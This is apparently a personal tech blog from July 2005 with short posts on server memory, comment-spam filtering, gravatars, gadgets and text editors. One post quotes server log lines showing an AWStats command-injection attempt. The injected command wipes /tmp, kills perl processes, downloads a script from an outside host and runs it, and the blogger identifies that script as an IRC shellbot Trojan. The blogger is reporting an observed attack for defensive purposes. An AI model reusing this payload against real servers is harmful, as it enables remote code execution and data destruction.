15 Jul, 2005
Saving memory
Since I have been having problem with what appears to be a memory leak, I have been taking a look at what has been taking all of the memory. I create a cron job that every five minutes gets the status of the computer. It is running the following command.
ps -auxw; cat /proc/meminfo
I don't have a monitor connected to this computer, but I do run a vnc server. This had been configured to start KDE. I changed the window manager for this vnc server to fvwm. This is a window manager that is smaller than KDE.
15 Jul, 2005
Another "productivity" tool
Planarity is a pretty fun puzzle game.
[via I Hate My Cubicle!!!]
13 Jul, 2005
iBoot
Today my server became unresponsive. It looks like apache was eating all of the memory on my computer, as I saw before. Luckily, my wife was home so she was able to reboot the computer.
I wanted to find an easier way to reboot the computer remotely. I found the Dataprobe iBoot is a device that can cut power to any device that is connected to the electrical outlet. It also looks like you can configure it so that a it will cut power and restore it if this devices doesn't receive any network pings.
It looks like this will be available at the end of August for around $250.
Technorati Tags: apache, Dataprobe iBoot, Software
13 Jul, 2005
Gravatar
I have just configured this blog to display gravatars next to each comment. A gravatar is a globally recognized avatar. You can sign up for free on gravatar.com, and upload a picture that you want associated with your email.
Then when a web site wants to display an image associated with your email address, it encrypts the email address with md5, and then sends a http request to their web site. Since it is using md5, it will not be possible to determine the email address from the url.
Technorati Tags: Blogging, gravatar
12 Jul, 2005
Fixed filtering bug in pLog
I had been noticing that spam comment messages had been getting through my spam filter in pLog. When I looked at the bayesian token database, it appeared that the tokens were being considered non-spam tokens. I wasn't able to find the messages that had those tokens in them.
After a little investigation, I found the problem. It appeared that if the message pass through the bayesian filter, and it thought that it wasn't spam, and then if it was blocked by another filter, the message was deleted. This would prevent me from being able to correct the bayesian spam filter.
I made a fix for this and have put it in the bug report. Now when a comment is rejected for any reason, if the bayesian filter through that it was not spam, it will untrain it and then retrain it as spam. Once it is approved, I will check it in.
With this fix, all spam messages have been blocked. (And the bayesian database is being trained correctly.)
12 Jul, 2005
Fixed php upgrade problems
Since I had the problems upgrading php, I really didn't spend too much more time trying to figure out what was the problem. Just recently, a the 4.3.11 version of php was released, so I decided to try the upgrade again.
I hit the same problem again. I did another search and I found the solution to my problem. I disabled the zend optimizer, and everything works correctly.
Technorati Tags: php, security
8 Jul, 2005
potential security hole in awstats [updated]
I noticed the following entries in my log file:
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
It appears that this person is attempting to have awstats download a perl script and have it executed on the web server. When I looked at the script that it is attempting to download, it attempts to connect to an irc server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")
(More)
8 Jul, 2005
DNS Anti Spam plugin
I have just enabled the DNS Anti Spam plugin to catch comment spam that isn't stopped with the bayesian filter. This plugin does some dns checks to determine if:
- The ip address is from a known spammer on sorbs.net, spamhaus.org, or dsbl.org.
- The title, body text, or the username has a url that is known to be sent out as spam at surbl.org
- The url is known to be sent out as spam at surbl.org
Technorati Tags: pLog, spam, Software
8 Jul, 2005
blog comment spam schedule?
I was curious about what type of comments were being caught in the bayesian spam filter that pLog has, so I change my setting to keep the spam messages (still marked as spam) instead of deleting them. On thing that I noticed is that it appears that on the 27th minute after the hour, I batch of spam comments get posted. (All of them are caught by the filter.)
If I have the 27th minute, I wonder who has the top of the hour.
Technorati Tags: Blogging, pLog, spam
8 Jul, 2005
Google as a referrer?
I have noticed someone doing something strange. They have configured their browser to report the referrer as Google.
XXX.XX.XX.XX - - [08/Jul/2005:16:26:28 -0700] "GET /index.php?op=ViewArticle&articleId=492&blogId=2 HTTP/1.0" 200 28062 "http://www.google.com/" "Mozilla (X11; I; Linux 2.0.32 i586)"
I can't image that there are web servers that allow different content when the referrer is the home page of Google. Especially since most valid referrers from Google will contain a the search query. (I really doubt that I am listed on Google's main page.)
7 Jul, 2005
pLog and xml vunerability
A vulnerability has been found in several implementations of xmlrpc libraries for php. pLog is not affected by this problem as it uses the Incutio XMLRPC library.
It looks like WordPress is affected by this problem. The 1.5.1.3 version of WordPress has fixed this problem.
Technorati Tags: Blogging, pLog, security
7 Jul, 2005
Creating XHTML in SubEthaEdit
I had just started playing with TextWrangler, and then I saw this post that describes a very cool feature of SubEthaEdit. Since SubEthaEdit will colorize text, now you can make this available in xhtml.
In the Edit menu, there is a menu item named "Copy As XHTML". This will put the XHTML in your clipboard. The result will look something like:
include_once( PLOG_CLASS_PATH."class/plugin/pluginbase.class.php" );
include_once( PLOG_CLASS_PATH."class/net/http/httpclient.class.php" );
include_once( PLOG_CLASS_PATH."class/net/requestgenerator.class.php" );
/**
* implements notification of
*/
class PluginSiteMap extends PluginBase
{
var $pluginEnabled;
var $cacheFolder;
[via Paint The Tiger]
Technorati Tags: Mac OS X, Software, SubEthaEdit, TextWrangler
6 Jul, 2005
Slingbox questions
Permalink |
Comments (1) |
Trackbacks (0) |
Electronics, Gadgets, Hardware It looks like Sling Media is shipping their Slingbox device. This looks like a very cool way to be able to watch all of you video content outside of your house. In fact, I think that this could replaces some of the uses of BitTorrent for video content. (I think that BitTorrent is used when people already have access to the content at home, but they want to watch it somewhere else.)
I wonder a couple of things about the Slingbox
- How does the setup software get the list of possible remote codes? It doesn't look like there is a way to learn remote codes from the Slingbox itself. Maybe they have a database that is similar to the one used by Harmony Remotes.
- Would it be possible to learn IR codes from multiple devices? For example, plug a AV switcher into the Slingbox, and use remote codes for the AV switcher to change video source, and then send commands for that device.
Technorati Tags: Electronics, gadgets, Slingbox
6 Jul, 2005
Technorati Tags
I have just started playing with Technorati Tags, since ecto has built in support for them. I can see two uses for tags that are not currently handled by the categories:
- Allow you to catagorize your posts more specifylcy
- Creates a link to other posts on the same topic
Ecto's implementation adds a link to the bottom of the post with links to the Technotati Tags page.
(More)
6 Jul, 2005
TextWrangler
I saw this post on TUAW about TextWrangler. It is a free text editor from Bare Bones Software that has some very cool features.
- grep search and replace
- syntax coloring
- integration with native perl
- built-in ftp/sftp client
- AppleScript support
- command line tools
Technorati Tags: Mac OS X, TextWrangler, Software